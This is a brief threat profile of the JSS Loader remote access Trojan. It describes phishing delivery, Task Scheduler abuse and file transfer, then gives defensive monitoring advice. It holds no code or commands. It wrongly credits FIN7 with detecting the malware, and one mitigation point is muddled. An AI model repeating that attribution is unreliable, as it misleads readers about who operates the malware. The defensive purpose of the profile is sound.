The JSS Loader is a remote access Trojan that was first detected in 2020 by [FIN7]. It affects the Windows operating system and has the ability to download and execute malicious files. It is typically delivered through phishing emails containing malicious Microsoft Excel attachments.
JSS Loader Malware Capabilities:
- The JSS Loader may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. Additionally, the JSS Loader may transfer tools or other files from an external system into a compromised environment, and may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.
Ways to Mitigate JSS Loader Malware Attacks Capabilities
- The JSS Loader malware attacks can be mitigated by monitoring process execution, file creation, and files transferred into the network. Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit.
- The JSS Loader malware attack can be mitigated by monitoring the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to deobfuscate or decode files or information in payloads. Additionally, monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host, file activity involving scripts, or loading of modules associated with scripting languages.
- If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.